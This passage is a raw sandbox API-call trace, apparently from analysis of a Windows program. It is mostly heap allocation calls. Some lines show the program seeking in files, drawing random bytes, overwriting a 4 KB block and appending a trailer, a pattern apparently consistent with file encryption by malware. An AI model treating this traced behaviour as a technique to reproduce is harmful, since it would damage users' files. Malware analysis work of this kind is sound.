RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.717] GetProcessHeap () returned 0x4f10000 [0085.717] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.717] GetProcessHeap () returned 0x4f10000 [0085.717] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.717] GetProcessHeap () returned 0x4f10000 [0085.717] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.718] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.718] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.719] GetProcessHeap () returned 0x4f10000 [0085.719] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.720] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.720] GetProcessHeap () returned 0x4f10000 [0085.721] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.721] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.721] GetProcessHeap () returned 0x4f10000 [0085.722] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.722] GetProcessHeap () returned 0x4f10000 [0085.722] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.722] GetProcessHeap () returned 0x4f10000 [0085.722] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.722] GetProcessHeap () returned 0x4f10000 [0085.722] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.722] GetProcessHeap () returned 0x4f10000 [0085.722] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.722] GetProcessHeap () returned 0x4f10000 [0085.722] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.722] SetFilePointerEx (in: hFile=0x9d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.722] WriteFile (in: hFile=0x9d4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.722] WriteFile (in: hFile=0x9d4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.722] GetProcessHeap () returned 0x4f10000 [0085.722] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.722] GetProcessHeap () returned 0x4f10000 [0085.722] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.722] GetProcessHeap () returned 0x4f10000 [0085.722] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.722] CloseHandle (hObject=0x9d4) returned 1 [0085.723] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 151 [0085.724] SetFilePointerEx (in: hFile=0x9d8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.724] ReadFile (in: hFile=0x9d8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.724] SetFilePointerEx (in: hFile=0x9d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.724] GetProcessHeap () returned 0x4f10000 [0085.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.724] GetProcessHeap () returned 0x4f10000 [0085.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.724] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.724] GetProcessHeap () returned 0x4f10000 [0085.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.724] ReadFile (in: hFile=0x9d8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.771] SetFilePointerEx (in: hFile=0x9d8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.771] WriteFile (in: hFile=0x9d8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.771] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.772] GetProcessHeap () returned 0x4f10000 [0085.772] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.773] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.773] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.774] GetProcessHeap () returned 0x4f10000 [0085.774] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.775] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.775] GetProcessHeap () returned 0x4f10000 [0085.776] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: 